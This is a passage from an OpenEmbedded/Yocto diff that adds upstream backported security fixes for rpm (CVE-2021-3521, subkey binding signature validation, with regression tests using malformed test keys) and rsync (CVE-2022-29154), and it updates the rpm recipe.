25-static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo, uint8_t sigtype,
26+static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo,
27 const uint8_t *p, const uint8_t *h, size_t hlen,
28 pgpDigParams sigp)
29 {
30@@ -524,10 +524,8 @@ static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo, uint8_t sigtype,
31 int mpil = pgpMpiLen(p);
32 if (p + mpil > pend)
33 break;
34- if (sigtype == PGPSIGTYPE_BINARY || sigtype == PGPSIGTYPE_TEXT) {
35- if (sigalg->setmpi(sigalg, i, p))
36- break;
37- }
38+ if (sigalg->setmpi(sigalg, i, p))
39+ break;
40 p += mpil;
41 }
42
43@@ -600,7 +598,7 @@ static int pgpPrtSig(pgpTag tag, const uint8_t *h, size_t hlen,
44 }
45
46 p = ((uint8_t *)v) + sizeof(*v);
47- rc = pgpPrtSigParams(tag, v->pubkey_algo, v->sigtype, p, h, hlen, _digp);
48+ rc = pgpPrtSigParams(tag, v->pubkey_algo, p, h, hlen, _digp);
49 } break;
50 case 4:
51 { pgpPktSigV4 v = (pgpPktSigV4)h;
52@@ -658,7 +656,7 @@ static int pgpPrtSig(pgpTag tag, const uint8_t *h, size_t hlen,
53 if (p > (h + hlen))
54 return 1;
55
56- rc = pgpPrtSigParams(tag, v->pubkey_algo, v->sigtype, p, h, hlen, _digp);
57+ rc = pgpPrtSigParams(tag, v->pubkey_algo, p, h, hlen, _digp);
58 } break;
59 default:
60 rpmlog(RPMLOG_WARNING, _("Unsupported version of key: V%d\n"), version);
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch
new file mode 100644
index 0000000000..c5f88a8c72
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch
@@ -0,0 +1,55 @@
1From 9f03f42e2614a68f589f9db8fe76287146522c0c Mon Sep 17 00:00:00 2001
2From: Panu Matilainen <pmatilai@redhat.com>
3Date: Thu, 30 Sep 2021 09:56:20 +0300
4Subject: [PATCH] Refactor pgpDigParams construction to helper function
5
6No functional changes, just to reduce code duplication and needed by
7the following commits.
8
9Dependent patch:
10CVE: CVE-2021-3521
11Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/9f03f42e2614a68f589f9db8fe76287146522c0c]
12Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
13
14---
15 rpmio/rpmpgp.c | 13 +++++++++----
16 1 file changed, 9 insertions(+), 4 deletions(-)
17
18diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
19index 340de5fc9a..aad7c275c9 100644
20--- a/rpmio/rpmpgp.c
21+++ b/rpmio/rpmpgp.c
22@@ -1055,6 +1055,13 @@ unsigned int pgpDigParamsAlgo(pgpDigParams digp, unsigned int algotype)
23 return algo;
24 }
25
26+static pgpDigParams pgpDigParamsNew(uint8_t tag)
27+{
28+ pgpDigParams digp = xcalloc(1, sizeof(*digp));
29+ digp->tag = tag;
30+ return digp;
31+}
32+
33 int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
34 pgpDigParams * ret)
35 {
36@@ -1072,8 +1079,7 @@ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
37 if (pkttype && pkt.tag != pkttype) {
38 break;
39 } else {
40- digp = xcalloc(1, sizeof(*digp));
41- digp->tag = pkt.tag;
42+ digp = pgpDigParamsNew(pkt.tag);
43 }
44 }
45
46@@ -1121,8 +1127,7 @@ int pgpPrtParamsSubkeys(const uint8_t *pkts, size_t pktlen,
47 digps = xrealloc(digps, alloced * sizeof(*digps));
48 }
49
50- digps[count] = xcalloc(1, sizeof(**digps));
51- digps[count]->tag = PGPTAG_PUBLIC_SUBKEY;
52+ digps[count] = pgpDigParamsNew(PGPTAG_PUBLIC_SUBKEY);
53 /* Copy UID from main key to subkey */
54 digps[count]->userid = xstrdup(mainkey->userid);
55
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch
new file mode 100644
index 0000000000..fd31f11beb
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch
@@ -0,0 +1,34 @@
1From 5ff86764b17f31535cb247543a90dd739076ec38 Mon Sep 17 00:00:00 2001
2From: Demi Marie Obenour <demi@invisiblethingslab.com>
3Date: Thu, 6 May 2021 18:34:45 -0400
4Subject: [PATCH] Do not allow extra packets to follow a signature
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9According to RFC 4880 § 11.4, a detached signature is “simply a
10Signature packet”. Therefore, extra packets following a detached
11signature are not allowed.
12
13Dependent patch:
14CVE: CVE-2021-3521
15Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/5ff86764b17f31535cb247543a90dd739076ec38]
16Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
17
18---
19 rpmio/rpmpgp.c | 2 ++
20 1 file changed, 2 insertions(+)
21
22diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
23index f1a99e7169..5b346a8253 100644
24--- a/rpmio/rpmpgp.c
25+++ b/rpmio/rpmpgp.c
26@@ -1068,6 +1068,8 @@ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
27 break;
28
29 p += (pkt.body - pkt.head) + pkt.blen;
30+ if (pkttype == PGPTAG_SIGNATURE)
31+ break;
32 }
33
34 rc = (digp && (p == pend)) ? 0 : -1;
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch
new file mode 100644
index 0000000000..cb9e9842fe
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch
@@ -0,0 +1,330 @@
1From bd36c5dc9fb6d90c46fbfed8c2d67516fc571ec8 Mon Sep 17 00:00:00 2001
2From: Panu Matilainen <pmatilai@redhat.com>
3Date: Thu, 30 Sep 2021 09:59:30 +0300
4Subject: [PATCH] Validate and require subkey binding signatures on PGP public
5 keys
6
7All subkeys must be followed by a binding signature by the primary key
8as per the OpenPGP RFC, enforce the presence and validity in the parser.
9
10The implementation is as kludgey as they come to work around our
11simple-minded parser structure without touching API, to maximise
12backportability. Store all the raw packets internally as we decode them
13to be able to access previous elements at will, needed to validate ordering
14and access the actual data. Add testcases for manipulated keys whose
15import previously would succeed.
16
17Depends on the two previous commits:
187b399fcb8f52566e6f3b4327197a85facd08db91 and
19236b802a4aa48711823a191d1b7f753c82a89ec5
20
21CVE: CVE-2021-3521
22Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/bd36c5dc9fb6d90c46fbfed8c2d67516fc571ec8]
23Comment: Hunk refreshed
24Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
25
26Fixes CVE-2021-3521.
27---
28 rpmio/rpmpgp.c | 98 +++++++++++++++++--
29 tests/Makefile.am | 3 +
30 tests/data/keys/CVE-2021-3521-badbind.asc | 25 +++++
31 .../data/keys/CVE-2021-3521-nosubsig-last.asc | 25 +++++
32 tests/data/keys/CVE-2021-3521-nosubsig.asc | 37 +++++++
33 tests/rpmsigdig.at | 28 ++++++
34 6 files changed, 209 insertions(+), 7 deletions(-)
35 create mode 100644 tests/data/keys/CVE-2021-3521-badbind.asc
36 create mode 100644 tests/data/keys/CVE-2021-3521-nosubsig-last.asc
37 create mode 100644 tests/data/keys/CVE-2021-3521-nosubsig.asc
38
39diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
40index aad7c275c9..d70802ae86 100644
41--- a/rpmio/rpmpgp.c
42+++ b/rpmio/rpmpgp.c
43@@ -1004,37 +1004,121 @@ static pgpDigParams pgpDigParamsNew(uint8_t tag)
44 return digp;
45 }
46
47+static int hashKey(DIGEST_CTX hash, const struct pgpPkt *pkt, int exptag)
48+{
49+ int rc = -1;
50+ if (pkt->tag == exptag) {
51+ uint8_t head[] = {
52+ 0x99,
53+ (pkt->blen >> 8),
54+ (pkt->blen ),
55+ };
56+
57+ rpmDigestUpdate(hash, head, 3);
58+ rpmDigestUpdate(hash, pkt->body, pkt->blen);
59+ rc = 0;
60+ }
61+ return rc;
62+}
63+
64+static int pgpVerifySelf(pgpDigParams key, pgpDigParams selfsig,
65+ const struct pgpPkt *all, int i)
66+{
67+ int rc = -1;
68+ DIGEST_CTX hash = NULL;
69+
70+ switch (selfsig->sigtype) {
71+ case PGPSIGTYPE_SUBKEY_BINDING:
72+ hash = rpmDigestInit(selfsig->hash_algo, 0);
73+ if (hash) {
74+ rc = hashKey(hash, &all[0], PGPTAG_PUBLIC_KEY);
75+ if (!rc)
76+ rc = hashKey(hash, &all[i-1], PGPTAG_PUBLIC_SUBKEY);
77+ }
78+ break;
79+ default:
80+ /* ignore types we can't handle */
81+ rc = 0;
82+ break;
83+ }
84+
85+ if (hash && rc == 0)
86+ rc = pgpVerifySignature(key, selfsig, hash);
87+
88+ rpmDigestFinal(hash, NULL, NULL, 0);
89+
90+ return rc;
91+}
92+
93 int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
94 pgpDigParams * ret)
95 {
96 const uint8_t *p = pkts;
97 const uint8_t *pend = pkts + pktlen;
98 pgpDigParams digp = NULL;
99- struct pgpPkt pkt;
100+ pgpDigParams selfsig = NULL;
101+ int i = 0;
102+ int alloced = 16; /* plenty for normal cases */
103+ struct pgpPkt *all = xmalloc(alloced * sizeof(*all));
104 int rc = -1; /* assume failure */
105+ int expect = 0;
106+ int prevtag = 0;
107
108 while (p < pend) {
109- if (decodePkt(p, (pend - p), &pkt))
110+ struct pgpPkt *pkt = &all[i];
111+ if (decodePkt(p, (pend - p), pkt))
112 break;
113
114 if (digp == NULL) {
115- if (pkttype && pkt.tag != pkttype) {
116+ if (pkttype && pkt->tag != pkttype) {
117 break;
118 } else {
119- digp = pgpDigParamsNew(pkt.tag);
120+ digp = pgpDigParamsNew(pkt->tag);
121 }
122 }
123
124- if (pgpPrtPkt(&pkt, digp))
125+ if (expect) {
126+ if (pkt->tag != expect)
127+ break;
128+ selfsig = pgpDigParamsNew(pkt->tag);
129+ }
130+
131+ if (pgpPrtPkt(pkt, selfsig ? selfsig : digp))
132 break;
133
134- p += (pkt.body - pkt.head) + pkt.blen;
135+ if (selfsig) {
136+ /* subkeys must be followed by binding signature */
137+ if (prevtag == PGPTAG_PUBLIC_SUBKEY) {
138+ if (selfsig->sigtype != PGPSIGTYPE_SUBKEY_BINDING)
139+ break;
140+ }
141+
142+ int xx = pgpVerifySelf(digp, selfsig, all, i);
143+
144+ selfsig = pgpDigParamsFree(selfsig);
145+ if (xx)
146+ break;
147+ expect = 0;
148+ }
149+
150+ if (pkt->tag == PGPTAG_PUBLIC_SUBKEY)
151+ expect = PGPTAG_SIGNATURE;
152+ prevtag = pkt->tag;
153+
154+ i++;
155+ p += (pkt->body - pkt->head) + pkt->blen;
156 if (pkttype == PGPTAG_SIGNATURE)
157 break;
158+
159+ if (alloced <= i) {
160+ alloced *= 2;
161+ all = xrealloc(all, alloced * sizeof(*all));
162+ }
163 }
164
165- rc = (digp && (p == pend)) ? 0 : -1;
166+ rc = (digp && (p == pend) && expect == 0) ? 0 : -1;
167
168+ free(all);
169 if (ret && rc == 0) {
170 *ret = digp;
171 } else {
172diff --git a/tests/Makefile.am b/tests/Makefile.am
173index b4a2e2e1ce..bc535d2833 100644
174--- a/tests/Makefile.am
175+++ b/tests/Makefile.am
176@@ -87,6 +87,9 @@ EXTRA_DIST += data/SPECS/hello-config-buildid.spec
177 EXTRA_DIST += data/SPECS/hello-cd.spec
178 EXTRA_DIST += data/keys/rpm.org-rsa-2048-test.pub
179 EXTRA_DIST += data/keys/rpm.org-rsa-2048-test.secret
180+EXTRA_DIST += data/keys/CVE-2021-3521-badbind.asc
181+EXTRA_DIST += data/keys/CVE-2021-3521-nosubsig.asc
182+EXTRA_DIST += data/keys/CVE-2021-3521-nosubsig-last.asc
183 EXTRA_DIST += data/macros.testfile
184
185 # testsuite voodoo
186diff --git a/tests/data/keys/CVE-2021-3521-badbind.asc b/tests/data/keys/CVE-2021-3521-badbind.asc
187new file mode 100644
188index 0000000000..aea00f9d7a
189--- /dev/null
190+++ b/tests/data/keys/CVE-2021-3521-badbind.asc
191@@ -0,0 +1,25 @@
192+-----BEGIN PGP PUBLIC KEY BLOCK-----
193+Version: rpm-4.17.90 (NSS-3)
194+
195+mQENBFjmORgBCAC7TMEk6wnjSs8Dr4yqSScWdU2pjcqrkTxuzdWvowcIUPZI0w/g
196+HkRqGd4apjvY2V15kjL10gk3QhFP3pZ/9p7zh8o8NHX7aGdSGDK7NOq1eFaErPRY
197+91LW9RiZ0lbOjXEzIL0KHxUiTQEmdXJT43DJMFPyW9fkCWg0OltiX618FUdWWfI8
198+eySdLur1utnqBvdEbCUvWK2RX3vQZQdvEBODnNk2pxqTyV0w6VPQ96W++lF/5Aas
199+7rUv3HIyIXxIggc8FRrnH+y9XvvHDonhTIlGnYZN4ubm9i4y3gOkrZlGTrEw7elQ
200+1QeMyG2QQEbze8YjpTm4iLABCBrRfPRaQpwrABEBAAG0IXJwbS5vcmcgUlNBIHRl
201+c3RrZXkgPHJzYUBycG0ub3JnPokBNwQTAQgAIQUCWOY5GAIbAwULCQgHAgYVCAkK
202+CwIEFgIDAQIeAQIXgAAKCRBDRFkeGWTF/MxxCACnjqFL+MmPh9W9JQKT2DcLbBzf
203+Cqo6wcEBoCOcwgRSk8dSikhARoteoa55JRJhuMyeKhhEAogE9HRmCPFdjezFTwgB
204+BDVBpO2dZ023mLXDVCYX3S8pShOgCP6Tn4wqCnYeAdLcGg106N4xcmgtcssJE+Pr
205+XzTZksbZsrTVEmL/Ym+R5w5jBfFnGk7Yw7ndwfQsfNXQb5AZynClFxnX546lcyZX
206+fEx3/e6ezw57WNOUK6WT+8b+EGovPkbetK/rGxNXuWaP6X4A/QUm8O98nCuHYFQq
207++mvNdsCBqGf7mhaRGtpHk/JgCn5rFvArMDqLVrR9hX0LdCSsH7EGE+bR3r7wuQEN
208+BFjmORgBCACk+vDZrIXQuFXEYToZVwb2attzbbJJCqD71vmZTLsW0QxuPKRgbcYY
209+zp4K4lVBnHhFrF8MOUOxJ7kQWIJZMZFt+BDcptCYurbD2H4W2xvnWViiC+LzCMzz
210+iMJT6165uefL4JHTDPxC2fFiM9yrc72LmylJNkM/vepT128J5Qv0gRUaQbHiQuS6
211+Dm/+WRnUfx3i89SV4mnBxb/Ta93GVqoOciWwzWSnwEnWYAvOb95JL4U7c5J5f/+c
212+KnQDHsW7sIiIdscsWzvgf6qs2Ra1Zrt7Fdk4+ZS2f/adagLhDO1C24sXf5XfMk5m
213+L0OGwZSr9m5s17VXxfspgU5ugc8kBJfzABEBAAE=
214+=WCfs
215+-----END PGP PUBLIC KEY BLOCK-----
216+
217diff --git a/tests/data/keys/CVE-2021-3521-nosubsig-last.asc b/tests/data/keys/CVE-2021-3521-nosubsig-last.asc
218new file mode 100644
219index 0000000000..aea00f9d7a
220--- /dev/null
221+++ b/tests/data/keys/CVE-2021-3521-nosubsig-last.asc
222@@ -0,0 +1,25 @@
223+-----BEGIN PGP PUBLIC KEY BLOCK-----
224+Version: rpm-4.17.90 (NSS-3)
225+
226+mQENBFjmORgBCAC7TMEk6wnjSs8Dr4yqSScWdU2pjcqrkTxuzdWvowcIUPZI0w/g
227+HkRqGd4apjvY2V15kjL10gk3QhFP3pZ/9p7zh8o8NHX7aGdSGDK7NOq1eFaErPRY
228+91LW9RiZ0lbOjXEzIL0KHxUiTQEmdXJT43DJMFPyW9fkCWg0OltiX618FUdWWfI8
229+eySdLur1utnqBvdEbCUvWK2RX3vQZQdvEBODnNk2pxqTyV0w6VPQ96W++lF/5Aas
230+7rUv3HIyIXxIggc8FRrnH+y9XvvHDonhTIlGnYZN4ubm9i4y3gOkrZlGTrEw7elQ
231+1QeMyG2QQEbze8YjpTm4iLABCBrRfPRaQpwrABEBAAG0IXJwbS5vcmcgUlNBIHRl
232+c3RrZXkgPHJzYUBycG0ub3JnPokBNwQTAQgAIQUCWOY5GAIbAwULCQgHAgYVCAkK
233+CwIEFgIDAQIeAQIXgAAKCRBDRFkeGWTF/MxxCACnjqFL+MmPh9W9JQKT2DcLbBzf
234+Cqo6wcEBoCOcwgRSk8dSikhARoteoa55JRJhuMyeKhhEAogE9HRmCPFdjezFTwgB
235+BDVBpO2dZ023mLXDVCYX3S8pShOgCP6Tn4wqCnYeAdLcGg106N4xcmgtcssJE+Pr
236+XzTZksbZsrTVEmL/Ym+R5w5jBfFnGk7Yw7ndwfQsfNXQb5AZynClFxnX546lcyZX
237+fEx3/e6ezw57WNOUK6WT+8b+EGovPkbetK/rGxNXuWaP6X4A/QUm8O98nCuHYFQq
238++mvNdsCBqGf7mhaRGtpHk/JgCn5rFvArMDqLVrR9hX0LdCSsH7EGE+bR3r7wuQEN
239+BFjmORgBCACk+vDZrIXQuFXEYToZVwb2attzbbJJCqD71vmZTLsW0QxuPKRgbcYY
240+zp4K4lVBnHhFrF8MOUOxJ7kQWIJZMZFt+BDcptCYurbD2H4W2xvnWViiC+LzCMzz
241+iMJT6165uefL4JHTDPxC2fFiM9yrc72LmylJNkM/vepT128J5Qv0gRUaQbHiQuS6
242+Dm/+WRnUfx3i89SV4mnBxb/Ta93GVqoOciWwzWSnwEnWYAvOb95JL4U7c5J5f/+c
243+KnQDHsW7sIiIdscsWzvgf6qs2Ra1Zrt7Fdk4+ZS2f/adagLhDO1C24sXf5XfMk5m
244+L0OGwZSr9m5s17VXxfspgU5ugc8kBJfzABEBAAE=
245+=WCfs
246+-----END PGP PUBLIC KEY BLOCK-----
247+
248diff --git a/tests/data/keys/CVE-2021-3521-nosubsig.asc b/tests/data/keys/CVE-2021-3521-nosubsig.asc
249new file mode 100644
250index 0000000000..3a2e7417f8
251--- /dev/null
252+++ b/tests/data/keys/CVE-2021-3521-nosubsig.asc
253@@ -0,0 +1,37 @@
254+-----BEGIN PGP PUBLIC KEY BLOCK-----
255+Version: rpm-4.17.90 (NSS-3)
256+
257+mQENBFjmORgBCAC7TMEk6wnjSs8Dr4yqSScWdU2pjcqrkTxuzdWvowcIUPZI0w/g
258+HkRqGd4apjvY2V15kjL10gk3QhFP3pZ/9p7zh8o8NHX7aGdSGDK7NOq1eFaErPRY
259+91LW9RiZ0lbOjXEzIL0KHxUiTQEmdXJT43DJMFPyW9fkCWg0OltiX618FUdWWfI8
260+eySdLur1utnqBvdEbCUvWK2RX3vQZQdvEBODnNk2pxqTyV0w6VPQ96W++lF/5Aas
261+7rUv3HIyIXxIggc8FRrnH+y9XvvHDonhTIlGnYZN4ubm9i4y3gOkrZlGTrEw7elQ
262+1QeMyG2QQEbze8YjpTm4iLABCBrRfPRaQpwrABEBAAG0IXJwbS5vcmcgUlNBIHRl
263+c3RrZXkgPHJzYUBycG0ub3JnPokBNwQTAQgAIQUCWOY5GAIbAwULCQgHAgYVCAkK
264+CwIEFgIDAQIeAQIXgAAKCRBDRFkeGWTF/MxxCACnjqFL+MmPh9W9JQKT2DcLbBzf
265+Cqo6wcEBoCOcwgRSk8dSikhARoteoa55JRJhuMyeKhhEAogE9HRmCPFdjezFTwgB
266+BDVBpO2dZ023mLXDVCYX3S8pShOgCP6Tn4wqCnYeAdLcGg106N4xcmgtcssJE+Pr
267+XzTZksbZsrTVEmL/Ym+R5w5jBfFnGk7Yw7ndwfQsfNXQb5AZynClFxnX546lcyZX
268+fEx3/e6ezw57WNOUK6WT+8b+EGovPkbetK/rGxNXuWaP6X4A/QUm8O98nCuHYFQq
269++mvNdsCBqGf7mhaRGtpHk/JgCn5rFvArMDqLVrR9hX0LdCSsH7EGE+bR3r7wuQEN
270+BFjmORgBCACk+vDZrIXQuFXEYToZVwb2attzbbJJCqD71vmZTLsW0QxuPKRgbcYY
271+zp4K4lVBnHhFrF8MOUOxJ7kQWIJZMZFt+BDcptCYurbD2H4W2xvnWViiC+LzCMzz
272+iMJT6165uefL4JHTDPxC2fFiM9yrc72LmylJNkM/vepT128J5Qv0gRUaQbHiQuS6
273+Dm/+WRnUfx3i89SV4mnBxb/Ta93GVqoOciWwzWSnwEnWYAvOb95JL4U7c5J5f/+c
274+KnQDHsW7sIiIdscsWzvgf6qs2Ra1Zrt7Fdk4+ZS2f/adagLhDO1C24sXf5XfMk5m
275+L0OGwZSr9m5s17VXxfspgU5ugc8kBJfzABEBAAG5AQ0EWOY5GAEIAKT68NmshdC4
276+VcRhOhlXBvZq23NtskkKoPvW+ZlMuxbRDG48pGBtxhjOngriVUGceEWsXww5Q7En
277+uRBYglkxkW34ENym0Ji6tsPYfhbbG+dZWKIL4vMIzPOIwlPrXrm558vgkdMM/ELZ
278+8WIz3KtzvYubKUk2Qz+96lPXbwnlC/SBFRpBseJC5LoOb/5ZGdR/HeLz1JXiacHF
279+v9Nr3cZWqg5yJbDNZKfASdZgC85v3kkvhTtzknl//5wqdAMexbuwiIh2xyxbO+B/
280+qqzZFrVmu3sV2Tj5lLZ/9p1qAuEM7ULbixd/ld8yTmYvQ4bBlKv2bmzXtVfF+ymB
281+Tm6BzyQEl/MAEQEAAYkBHwQYAQgACQUCWOY5GAIbDAAKCRBDRFkeGWTF/PANB/9j
282+mifmj6z/EPe0PJFhrpISt9PjiUQCt0IPtiL5zKAkWjHePIzyi+0kCTBF6DDLFxos
283+3vN4bWnVKT1kBhZAQlPqpJTg+m74JUYeDGCdNx9SK7oRllATqyu+5rncgxjWVPnQ
284+zu/HRPlWJwcVFYEVXYL8xzfantwQTqefjmcRmBRdA2XJITK+hGWwAmrqAWx+q5xX
285+Pa8wkNMxVzNS2rUKO9SoVuJ/wlUvfoShkJ/VJ5HDp3qzUqncADfdGN35TDzscngQ
286+gHvnMwVBfYfSCABV1hNByoZcc/kxkrWMmsd/EnIyLd1Q1baKqc3cEDuC6E6/o4yJ
287+E4XX4jtDmdZPreZALsiB
288+=rRop
289+-----END PGP PUBLIC KEY BLOCK-----
290+
291diff --git a/tests/rpmsigdig.at b/tests/rpmsigdig.at
292index 0f8f2b4884..c8b9f139e1 100644
293--- a/tests/rpmsigdig.at
294+++ b/tests/rpmsigdig.at
295@@ -240,6 +240,34 @@ gpg(185e6146f00650f8) = 4:185e6146f00650f8-58e63918
296 [])
297 AT_CLEANUP
298
299+AT_SETUP([rpmkeys --import invalid keys])
300+AT_KEYWORDS([rpmkeys import])
301+RPMDB_INIT
302+
303+AT_CHECK([
304+runroot rpmkeys --import /data/keys/CVE-2021-3521-badbind.asc
305+],
306+[1],
307+[],
308+[error: /data/keys/CVE-2021-3521-badbind.asc: key 1 import failed.]
309+)
310+AT_CHECK([
311+runroot rpmkeys --import /data/keys/CVE-2021-3521-nosubsig.asc
312+],
313+[1],
314+[],
315+[error: /data/keys/CVE-2021-3521-nosubsig.asc: key 1 import failed.]
316+)
317+
318+AT_CHECK([
319+runroot rpmkeys --import /data/keys/CVE-2021-3521-nosubsig-last.asc
320+],
321+[1],
322+[],
323+[error: /data/keys/CVE-2021-3521-nosubsig-last.asc: key 1 import failed.]
324+)
325+AT_CLEANUP
326+
327 # ------------------------------
328 # Test pre-built package verification
329 AT_SETUP([rpmkeys -K <signed> 1])
330
diff --git a/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb b/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb
index 4029217d08..4d605c8501 100644
--- a/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb
+++ b/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb
@@ -24,7 +24,7 @@ HOMEPAGE = "http://www.rpm.org"
24LICENSE = "GPL-2.0" 24LICENSE = "GPL-2.0"
25LIC_FILES_CHKSUM = "file://COPYING;md5=c0bf017c0fd1920e6158a333acabfd4a" 25LIC_FILES_CHKSUM = "file://COPYING;md5=c0bf017c0fd1920e6158a333acabfd4a"
26 26
27SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \ 27SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x;protocol=https \
28 file://0001-Do-not-add-an-unsatisfiable-dependency-when-building.patch \ 28 file://0001-Do-not-add-an-unsatisfiable-dependency-when-building.patch \
29 file://0001-Do-not-read-config-files-from-HOME.patch \ 29 file://0001-Do-not-read-config-files-from-HOME.patch \
30 file://0001-When-cross-installing-execute-package-scriptlets-wit.patch \ 30 file://0001-When-cross-installing-execute-package-scriptlets-wit.patch \
@@ -44,6 +44,13 @@ SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \
44 file://0001-mono-find-provides-requires-do-not-use-monodis-from-.patch \ 44 file://0001-mono-find-provides-requires-do-not-use-monodis-from-.patch \
45 file://0001-Rip-out-partial-support-for-unused-MD2-and-RIPEMD160.patch \ 45 file://0001-Rip-out-partial-support-for-unused-MD2-and-RIPEMD160.patch \
46 file://0001-rpmplugins.c-call-dlerror-prior-to-dlsym.patch \ 46 file://0001-rpmplugins.c-call-dlerror-prior-to-dlsym.patch \
47 file://0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch \
48 file://CVE-2021-3421.patch \
49 file://CVE-2021-20266.patch \
50 file://CVE-2021-3521-01.patch \
51 file://CVE-2021-3521-02.patch \
52 file://CVE-2021-3521-03.patch \
53 file://CVE-2021-3521.patch \
47 " 54 "
48 55
49PE = "1" 56PE = "1"
@@ -60,7 +67,8 @@ export PYTHON_ABI
60# OE-core patches autoreconf to additionally run gnu-configize, which fails with this recipe 67# OE-core patches autoreconf to additionally run gnu-configize, which fails with this recipe
61EXTRA_AUTORECONF_append = " --exclude=gnu-configize" 68EXTRA_AUTORECONF_append = " --exclude=gnu-configize"
62 69
63EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl" 70# Vendor is detected differently on x86 and aarch64 hosts and can feed into target packages
71EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl --with-vendor=pc"
64EXTRA_OECONF_append_libc-musl = " --disable-nls" 72EXTRA_OECONF_append_libc-musl = " --disable-nls"
65 73
66# --sysconfdir prevents rpm from attempting to access machine-specific configuration in sysroot/etc; we need to have it in rootfs 74# --sysconfdir prevents rpm from attempting to access machine-specific configuration in sysroot/etc; we need to have it in rootfs
diff --git a/meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch b/meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch
new file mode 100644
index 0000000000..b2e02dba97
--- /dev/null
+++ b/meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch
@@ -0,0 +1,31 @@
1From fabef23bea6e9963c06e218586fda1a823e3c6bf Mon Sep 17 00:00:00 2001
2From: Wayne Davison <wayne@opencoder.net>
3Date: Mon, 8 Aug 2022 21:30:21 -0700
4Subject: [PATCH] Fix --relative when copying an absolute path.
5
6CVE: CVE-2022-29154
7Upstream-Status: Backport [https://github.com/WayneD/rsync/commit/fabef23bea6e9963c06e218586fda1a823e3c6bf]
8Signed-off-by: Matthias Schmitz <matthias.schmitz@port4949.net>
9---
10 exclude.c | 4 +++-
11 1 file changed, 3 insertions(+), 1 deletion(-)
12
13diff --git a/exclude.c b/exclude.c
14index 2394023f..ba5ca5a3 100644
15--- a/exclude.c
16+++ b/exclude.c
17@@ -434,8 +434,10 @@ void add_implied_include(const char *arg)
18 *p++ = *cp++;
19 break;
20 case '/':
21- if (p[-1] == '/') /* This is safe because of the initial slash. */
22+ if (p[-1] == '/') { /* This is safe because of the initial slash. */
23+ cp++;
24 break;
25+ }
26 if (relative_paths) {
27 filter_rule const *ent;
28 int found = 0;
29--
302.39.2
31
diff --git a/meta/recipes-devtools/rsync/files/CVE-2022-29154.patch b/meta/recipes-devtools/rsync/files/CVE-2022-29154.patch
new file mode 100644
index 0000000000..61e4e03254
--- /dev/null
+++ b/meta/recipes-devtools/rsync/files/CVE-2022-29154.patch
@@ -0,0 +1,334 @@
1From b7231c7d02cfb65d291af74ff66e7d8c507ee871 Mon Sep 17 00:00:00 2001
2From: Wayne Davison <wayne@opencoder.net>
3Date: Sun, 31 Jul 2022 16:55:34 -0700
4Subject: [PATCH] Some extra file-list safety checks.
5
6CVE-2022-29154 rsync: remote arbitrary files write inside the
7
8Upstream-Status: Backport from [https://git.samba.org/?p=rsync.git;a=patch;h=b7231c7d02cfb65d291af74ff66e7d8c507ee871]
9CVE:CVE-2022-29154
10Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
11---
12 exclude.c | 127 ++++++++++++++++++++++++++++++++++++++++++++++++++++-
13 flist.c | 17 ++++++-
14 io.c | 4 ++
15 main.c | 7 ++-
16 receiver.c | 11 +++--
17 5 files changed, 158 insertions(+), 8 deletions(-)
18
19diff --git a/exclude.c b/exclude.c
20index 7989fb3..e146e96 100644
21--- a/exclude.c
22+++ b/exclude.c
23@@ -26,16 +26,21 @@ extern int am_server;
24 extern int am_sender;
25 extern int eol_nulls;
26 extern int io_error;
27+extern int xfer_dirs;
28+extern int recurse;
29 extern int local_server;
30 extern int prune_empty_dirs;
31 extern int ignore_perishable;
32+extern int relative_paths;
33 extern int delete_mode;
34 extern int delete_excluded;
35 extern int cvs_exclude;
36 extern int sanitize_paths;
37 extern int protocol_version;
38+extern int list_only;
39 extern int module_id;
40
41+extern char *filesfrom_host;
42 extern char curr_dir[MAXPATHLEN];
43 extern unsigned int curr_dir_len;
44 extern unsigned int module_dirlen;
45@@ -43,8 +48,10 @@ extern unsigned int module_dirlen;
46 filter_rule_list filter_list = { .debug_type = "" };
